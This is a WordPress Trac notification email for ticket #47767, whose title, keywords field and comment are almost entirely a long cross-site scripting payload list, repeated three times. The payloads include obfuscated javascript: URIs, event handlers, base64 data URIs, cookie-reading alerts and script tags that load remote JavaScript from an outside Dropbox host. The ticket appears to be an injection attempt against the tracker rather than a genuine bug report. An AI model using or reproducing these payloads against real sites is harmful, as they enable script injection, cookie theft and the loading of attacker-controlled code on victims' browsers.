[wp-trac] [WordPress Trac] #47767: <iframe %00 src="&Tab; javascript:prompt(1)&Tab; "%00> <svg><style>{font-family&colon; '<iframe/onload=confirm(1)>' <input/onmouseover="javaSCRIPT&colon; confirm&lpar; 1&rpar; " <sVg><scRipt %00>alert&lpar; 1&rpar; {Opera} <img/src=`%00` onerror=this.onerror=confirm(1) <form><isindex formaction="javascript&colon; confirm(1)" <img src=`%00`&NewLine; onerror=alert(1)&NewLine; <script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab; ></script> <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=? <iframe/src="data:text/html; &Tab; base64&Tab; ,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="> <script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/ &#34; &#62; <h1/onmouseover='\u0061lert(1)'>%00 <iframe/src="data:text/html,<svg &#111; &#110; load=alert(1)>"> <meta content="&NewLine; 1 &NewLine; ; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/> <svg><script xlink:href=data&colon; ,window.open('https://www.google.com/')></script <svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera} <meta http-equiv="refresh" content="0; url=javascript:confirm(1)"> <iframe src=javascript&colon; alert&lpar; document&period; location&rpar; > <form><a href="javascript:\u0061lert&#x28; 1&#x29; ">X </script><img/*%00/src="worksinchrome&colon; prompt&#x28; 1&#x29; "/%00*/onerror='eval(src)'> <img/&#09; &#10; &#11; src=`~` onerror=prompt(1)> <form><iframe &#09; &#10; &#11; src="javascript&#58; alert(1)"&#11; &#10; &#09; ; > <a href="data:application/x-x509-user-cert; &NewLine; base64&NewLine; ,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&#09; &#10; &#11; >X</a http://www.google<script .com>alert(document.location)</script <a&#32; href&#61; &#91; &#00; &#93; "&#00; onmouseover=prompt&#40; 1&#41; &#47; &#47; ">XYZ</a <img/src=@&#32; &#13; onerror = prompt('&#49; ') <style/onload=prompt&#40; '&#88; &#83; &#83; '&#41; <script ^__^>alert(String.fromCharCode(49))</script ^__^ </style &#32; ><script &#32; :-(>/**/alert(document.location)/**/</script &#32; :-( 
&#00; </form><input type&#61; "date" onfocus="alert(1)"> <form><textarea &#13; onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28; 1&#x29; '> <script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/ <iframe srcdoc='&lt; body onload=prompt&lpar; 1&rpar; &gt; '> <a href="javascript:void(0)" onmouseover=&NewLine; javascript:alert(1)&NewLine; >X</a> <script ~~~>alert(0%0)</script ~~~> <style/onload=&lt; !--&#09; &gt; &#10; alert&#10; &lpar; 1&rpar; > <///style///><span %2F onmousemove='alert&lpar; 1&rpar; '>SPAN <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab; prompt(1) &#34; &#62; <svg><style>{-o-link-source&colon; '<body/onload=confirm(1)>' &#13; <blink/&#13; onmouseover=pr&#x6F; mp&#116; (1)>OnMouseOver {Firefox & Opera} <marquee onstart='javascript:alert&#x28; 1&#x29; '>^__^ <div/style="width:expression(confirm(1))">X</div> {IE7} <iframe/%00/ src=javaSCRIPT&colon; alert(1) //<form/action=javascript&#x3A; alert&lpar; document&period; cookie&rpar; ><input/type='submit'>// /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/> //|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\ </font>/<svg><style>{src&#x3A; '<style/onload=this.onload=confirm(1)>'</font>/</style> <a/href="javascript:&#13; javascript:prompt(1)"><input type="X"> </plaintext\></|\><plaintext/onmouseover=prompt(1) </svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28; 1&#x29; {Opera} <a href="javascript&colon; \u0061&#x6C; &#101%72t&lpar; 1&rpar; "><button> <div onmouseover='alert&lpar; 1&rpar; '>DIV</div> <iframe style="xg-p:absolute; top:0; left:0; width:100%; height:100%" onmouseover="prompt(1)"> <a href="jAvAsCrIpT&colon; alert&lpar; 1&rpar; ">X</a> <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> <var onmouseover="prompt(1)">On Mouse Over</var> <a 
href=javascript&colon; alert&lpar; document&period; cookie&rpar; >Click Here</a> <img src="/" =_=" title="onerror='prompt(1)'"> <%<!--'%><script>alert(1); </script --> <script src="data:text/javascript,alert(1)"></script> <iframe/src \/\/onload = prompt(1) <iframe/onreadystatechange=alert(1) <svg/onload=alert(1) <input value=<><iframe/src=javascript:confirm(1) <input type="text" value=`` <div/onmouseover='alert(1)'>X</div> http://www.<script>alert(1)</script .com <iframe src=j&NewLine; &Tab; a&NewLine; &Tab; &Tab; v&NewLine; &Tab; &Tab; &Tab; a&NewLine; &Tab; &Tab; &Tab; &Tab; s&NewLine; &Tab; &Tab; &Tab; &Tab; &Tab; c&NewLine; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; r&NewLine; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; i&NewLine; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; p&NewLine; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; t&NewLine; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &colon; a&NewLine; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; l&NewLine; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; e&NewLine; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; r&NewLine; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; t&NewLine; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; 28&NewLine; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; 1&NewLine; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; &Tab; %29></iframe> <svg><script ?>alert(1) <iframe src=j&Tab; a&Tab; v&Tab; a&Tab; s&Tab; c&Tab; r&Tab; i&Tab; p&Tab; t&Tab; :a&Tab; l&Tab; e&Tab; r&Tab; t&Tab; %28&Tab; 1&Tab; %29></iframe> <img src=`xx:xx`onerror=alert(1)> <meta http-equiv="refresh" content="0; javascript&colon; alert(1)"/> <math><a xlink:href="//jsfiddle.net/t846h/">click <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" 
allowscriptaccess=always> <svg contentScriptType=text/vbs><script>MsgBox+1 <a href="data:text/html; base64_,<svg/onload=\u0061&#x6C; &#101%72t(1)>">X</a <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE> <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+ <script/src="data&colon; text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F <script/src=data&colon; text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script <object data=javascript&colon; \u0061&#x6C; &#101%72t(1)> <script>+-+-1-+-+alert(1)</script> <body/onload=&lt; !--&gt; &#10alert(1)> <script itworksinallbrowsers>/*<script* */alert(1)</script <img src ?itworksonchrome?\/onerror = alert(1) <svg><script>//&NewLine; confirm(1); </script </svg> <svg><script onlypossibleinopera:-)> alert(1) <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A; &#97lert(1)>ClickMe <script x> alert(1) </script 1=2 <div/onmouseover='alert(1)'> style="x:"> <--`<img/src=` onerror=alert(1)> --!> <script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061; &#x06c; &#x0065; &#x00000072; &#x00074; (1)></script> <div style="xg-p:absolute; top:0; left:0; width:100%; height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button> "><img src=x onerror=window.open('https://www.google.com/'); > <form><button formaction=javascript&colon; alert(1)>CLICKME <math><a xlink:href="//jsfiddle.net/t846h/">click <object data=data:text/html; base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object> <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe> <a href="data:text/html; 
blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a>

WordPress Trac noreply at wordpress.org
Tue Jul 23 22:15:32 UTC 2019


#47767: <iframe %00 src="	javascript:prompt(1)	"%00>  <svg><style>{font-
family:'<iframe/onload=confirm(1)>'
<input/onmouseover="javaSCRIPT:confirm(1)"  <sVg><scRipt
%00>alert(1) {Opera}  <img/src=`%00`
onerror=this.onerror=confirm(1)  <form><isindex
formaction="javascript:confirm(1)"  <img src=`%00`

onerror=alert(1)
  <script/	
src='https://dl.dropbox.com/u/13018058/js.js' /	></script>  <ScRipT
5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
<iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
<script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/
"><h1/onmouseover='\u0061lert(1)'>%00
<iframe/src="data:text/html,<svg onload=alert(1)>">  <meta
content="
 1 
; JAVASCRIPT: alert(1)" http-
equiv="refresh"/>  <svg><script
xlink:href=data:,window.open('https://www.google.com/')></script
<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
<meta http-equiv="refresh" content="0;url=javascript:confirm(1)"> <iframe
src=javascript:alert(document.location)>  <form><a
href="javascript:\u0061lert&#x28;1&#x29;">X
</script><img/*%00/src="worksinchrome:prompt&#x28;1&#x29;"/%00*/onerror='eval(src)'>
<img/	
 src=`~` onerror=prompt(1)> <form><iframe
	
 src="javascript:alert(1)"
	;>  <a
href="data:application/x-x509-user-
cert;
base64
,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="	
>X</a
http://www.google<script .com>alert(document.location)</script
<a href=[�]"�
onmouseover=prompt(1)//">XYZ</a  <img/src=@ 
onerror = prompt('1')  <style/onload=prompt('XSS')
<script ^__^>alert(String.fromCharCode(49))</script ^__^  </style
 ><script   :-(>/**/alert(document.location)/**/</script   :-(
�</form><input type="date" onfocus="alert(1)">  <form><textarea

 onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;'>  <script
/***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script
/***/  <iframe srcdoc='<body onload=prompt(1)>'>  <a
href="javascript:void(0)"
onmouseover=
javascript:alert(1)
>X</a>  <script
~~~>alert(0%0)</script ~~~>
<style/onload=<!--	>
alert
(1)>
<///style///><span %2F onmousemove='alert(1)'>SPAN
<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=	prompt(1)
"><svg><style>{-o-link-source:'<body/onload=confirm(1)>'

<blink/
 onmouseover=pr&#x6F;mpt(1)>OnMouseOver {Firefox &
Opera}  <marquee onstart='javascript:alert&#x28;1&#x29;'>^__^
<div/style="width:expression(confirm(1))">X</div> {IE7}  <iframe/%00/
src=javaSCRIPT:alert(1)
//<form/action=javascript&#x3A;alert(document.cookie)><input/type='submit'>//
/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>
//|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\
</script //|\\
</font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style>
<a/href="javascript:
 javascript:prompt(1)"><input type="X">
</plaintext\></|\><plaintext/onmouseover=prompt(1)  </svg>''<svg><script
'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28;1&#x29; {Opera}  <a
href="javascript:\u0061&#x6C;&#101%72t(1)"><button>  <div
onmouseover='alert(1)'>DIV</div>  <iframe
style="xg-p:absolute;top:0;left:0;width:100%;height:100%"
onmouseover="prompt(1)">  <a
href="jAvAsCrIpT:alert(1)">X</a>  <embed
src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
<object
data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
<var onmouseover="prompt(1)">On Mouse Over</var>  <a
href=javascript:alert(document.cookie)>Click
Here</a>  <img src="/" =_=" title="onerror='prompt(1)'">
<%<!--'%><script>alert(1);</script -->  <script
src="data:text/javascript,alert(1)"></script> <iframe/src \/\/onload =
prompt(1)  <iframe/onreadystatechange=alert(1)  <svg/onload=alert(1)
<input value=<><iframe/src=javascript:confirm(1)  <input type="text"
value=`` <div/onmouseover='alert(1)'>X</div>
http://www.<script>alert(1)</script .com  <iframe
src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															28
																1
																	%29></iframe>
<svg><script ?>alert(1)  <iframe
src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe>
<img src=`xx:xx`onerror=alert(1)>  <meta http-equiv="refresh"
content="0;javascript:alert(1)"/> <math><a
xlink:href="//jsfiddle.net/t846h/">click  <embed
code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
<svg contentScriptType=text/vbs><script>MsgBox+1  <a
href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061')
worksinIE>  <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~
\u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script
U+
<script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script
a=\u0061 & /=%2F
<script/src=data:text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script
<object data=javascript:\u0061&#x6C;&#101%72t(1)>
<script>+-+-1-+-+alert(1)</script>  <body/onload=<!-->&#10alert(1)>
<script itworksinallbrowsers>/*<script* */alert(1)</script  <img src
?itworksonchrome?\/onerror = alert(1)
<svg><script>//
confirm(1);</script </svg> <svg><script
onlypossibleinopera:-)> alert(1)  <a aa aaa aaaa aaaaa aaaaaa aaaaaaa
aaaaaaaa aaaaaaaaa aaaaaaaaaa
href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe  <script x> alert(1)
</script 1=2  <div/onmouseover='alert(1)'> style="x:">  <--`<img/src=`
onerror=alert(1)> --!>
<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>
<div style="xg-p:absolute;top:0;left:0;width:100%;height:100%"
onmouseover="prompt(1)" onclick="alert(1)">x</button>  "><img src=x
onerror=window.open('https://www.google.com/');>  <form><button
formaction=javascript:alert(1)>CLICKME  <math><a
xlink:href="//jsfiddle.net/t846h/">click  <object
data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>  <iframe
src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
<a
href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click
Me</a>
-------------------------------------------------+-------------------------
 Reporter:  bugbounty00                          |       Owner:  (none)
     Type:  defect (bug)                         |      Status:  new
 Priority:  normal                               |   Milestone:  Awaiting
                                                 |  Review
Component:  General                              |     Version:
 Severity:  normal                               |  Resolution:
 Keywords:  <iframe %00                          |     Focuses:
  src="	javascript:prompt(1)	"%00>       |
  <svg><style>{font-                             |
  family:'<iframe/onload=confirm(1)>'      |
  <input/onmouseover="javaSCRIPT:confirm(1)"|
  <sVg><scRipt %00>alert(1) {Opera}    |
  <img/src=`%00`                                 |
  onerror=this.onerror=confirm(1)                |
  <form><isindex                                 |
  formaction="javascript:confirm(1)" <img  |
  src=`%00`
 onerror=alert(1)
   |
  <script/	                                  |
  src='https://dl.dropbox.com/u/13018058/js.js'  |
  /	></script> <ScRipT                       |
  5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?  |
  <iframe/src="data:text/html;	base64	   |
  PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="> <script     |
  /*%00*/>/*%00*/alert(1)/*%00*/</script         |
  /*%00*/                                        |
  "><h1/onmouseover='\u0061lert(1)'>%00  |
  <iframe/src="data:text/html <svg               |
  onload=alert(1)>"> <meta             |
  content="
 1 
;                |
  JAVASCRIPT: alert(1)" http-              |
  equiv="refresh"/> <svg><script                 |
  xlink:href=data:                         |
  window.open('https://www.google.com/')></script|
  <svg><script                                   |
  x:href='https://dl.dropbox.com/u/13018058/js.js'|
  {Opera} <meta http-equiv="refresh"             |
  content="0;url=javascript:confirm(1)">         |
  <iframe                                        |
  src=javascript:alert(document.location)>|
  <form><a                                       |
  href="javascript:\u0061lert&#x28;1&#x29;">X    |
  </script><img/*%00/src="worksinchrome:prompt&#x28;1&#x29;"/%00*/onerror='eval(src)'>|
  <img/	
 src=`~`                   |
  onerror=prompt(1)> <form><iframe               |
  	
                                |
  src="javascript:alert(1)"
	;> |
  <a href="data:application/x-x509-user-         |
  cert;
base64
                  |
  PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="	
>X</a|
  http://www.google<script                       |
  .com>alert(document.location)</script          |
  <a href=[�]"�          |
  onmouseover=prompt(1)//">XYZ</a|
  <img/src=@ 
 onerror =                 |
  prompt('1')                                |
  <style/onload=prompt('XSS')|
  <script                                        |
  ^__^>alert(String.fromCharCode(49))</script    |
  ^__^ </style  ><script                 |
  :-(>/**/alert(document.location)/**/</script   |
    :-( �</form><input type="date"   |
  onfocus="alert(1)"> <form><textarea 
      |
  onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;'>|
  <script                                        |
  /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script|
  /***/ <iframe srcdoc='<body                 |
  onload=prompt(1)>'> <a            |
  href="javascript:void(0)"                      |
  onmouseover=
javascript:alert(1)
>X</a>|
  <script ~~~>alert(0%0)</script ~~~>            |
  <style/onload=<!--	>
alert
(1)>|
  <///style///><span %2F                         |
  onmousemove='alert(1)'>SPAN          |
  <img/src='http://i.imgur.com/P8mL8.jpg'        |
  onmouseover=	prompt(1)                     |
  "><svg><style>{-o-link-                |
  source:'<body/onload=confirm(1)>'        |
  
<blink/
                              |
  onmouseover=pr&#x6F;mpt(1)>OnMouseOver    |
  {Firefox & Opera} <marquee                     |
  onstart='javascript:alert&#x28;1&#x29;'>^__^   |
  <div/style="width:expression(confirm(1))">X</div>|
  {IE7} <iframe/%00/                             |
  src=javaSCRIPT:alert(1)                  |
  //<form/action=javascript&#x3A;alert(document.cookie)><input/type='submit'>//|
  /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1)|
  /*iframe/src*/> //|\\ <script //|\\            |
  src='https://dl.dropbox.com/u/13018058/js.js'> |
  //|\\ </script //|\\                           |
  </font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style>|
  <a/href="javascript:
                      |
  javascript:prompt(1)"><input type="X">         |
  </plaintext\></|\><plaintext/onmouseover=prompt(1)|
  </svg>''<svg><script                           |
  'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28;1&#x29;|
  {Opera} <a                                     |
  href="javascript:\u0061&#x6C;&#101%72t(1)"><button>|
  <div                                           |
  onmouseover='alert(1)'>DIV</div>     |
  <iframe                                        |
  style="xg-p:absolute;top:0;left:0;width:100%;height:100%"|
  onmouseover="prompt(1)"> <a                    |
  href="jAvAsCrIpT:alert(1)">X</a>|
  <embed                                         |
  src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">|
  <object                                        |
  data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">|
  <var onmouseover="prompt(1)">On Mouse          |
  Over</var> <a                                  |
  href=javascript:alert(document.cookie)>Click|
  Here</a> <img src="/" =_="                     |
  title="onerror='prompt(1)'">                   |
  <%<!--'%><script>alert(1);</script -->         |
  <script src="data:text/javascript              |
  alert(1)"></script> <iframe/src \/\/onload =   |
  prompt(1) <iframe/onreadystatechange=alert(1)  |
  <svg/onload=alert(1) <input                    |
  value=<><iframe/src=javascript:confirm(1)      |
  <input type="text" value=``                    |
  <div/onmouseover='alert(1)'>X</div>            |
  http://www.<script>alert(1)</script .com       |
  <iframe                                        |
  src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															28
																1
																	%29></iframe>|
  <svg><script ?>alert(1) <iframe                |
  src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe>|
  <img src=`xx:xx`onerror=alert(1)> <meta http-  |
  equiv="refresh"                                |
  content="0;javascript:alert(1)"/>        |
  <math><a                                       |
  xlink:href="//jsfiddle.net/t846h/">click       |
  <embed                                         |
  code="http://businessinfo.co.uk/labs/xss/xss.swf"|
  allowscriptaccess=always> <svg                 |
  contentScriptType=text/vbs><script>MsgBox+1    |
  <a href="data:text/html;base64_                |
  <svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a    |
  <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061')|
  worksinIE> <script>~'\u0061' ;                 |
  \u0074\u0068\u0072\u006F\u0077 ~               |
  \u0074\u0068\u0069\u0073.                      |
  \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script|
  U+                                             |
  <script/src="data:text%2Fj\u0061v\u0061script|
  \u0061lert('\u0061')"></script a=\u0061 &      |
  /=%2F                                          |
  <script/src=data:text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116|
  \u0061%6C%65%72%74(/XSS/)></script <object     |
  data=javascript:\u0061&#x6C;&#101%72t(1)>|
  <script>+-+-1-+-+alert(1)</script>             |
  <body/onload=<!-->&#10alert(1)> <script  |
  itworksinallbrowsers>/*<script*                |
  */alert(1)</script <img src                    |
  ?itworksonchrome?\/onerror = alert(1)          |
  <svg><script>//
confirm(1);</script    |
  </svg> <svg><script onlypossibleinopera:-)>    |
  alert(1) <a aa aaa aaaa aaaaa aaaaaa aaaaaaa   |
  aaaaaaaa aaaaaaaaa aaaaaaaaaa                  |
  href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe |
  <script x> alert(1) </script 1=2               |
  <div/onmouseover='alert(1)'> style="x:">       |
  <--`<img/src=` onerror=alert(1)> --!>          |
  <script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074|
  &#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>|
  <div                                           |
  style="xg-p:absolute;top:0;left:0;width:100%;height:100%"|
  onmouseover="prompt(1)"                        |
  onclick="alert(1)">x</button> "><img src=x     |
  onerror=window.open('https://www.google.com/');>|
  <form><button                                  |
  formaction=javascript:alert(1)>CLICKME   |
  <math><a                                       |
  xlink:href="//jsfiddle.net/t846h/">click       |
  <object data=data:text/html;base64             |
  PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>         |
  <iframe src="data:text/html                    |
  %3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>|
  <a href="data:text/html;blabla                 |
  &#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click|
  Me</a>                                         |
-------------------------------------------------+-------------------------
Changes (by bugbounty00):

 * Attachment "test (2).jpg" removed.

 "><img src=Xss onerror=alert(1)>

-- 
Ticket URL: <https://core.trac.wordpress.org/ticket/47767>
WordPress Trac <https://core.trac.wordpress.org/>
WordPress publishing platform

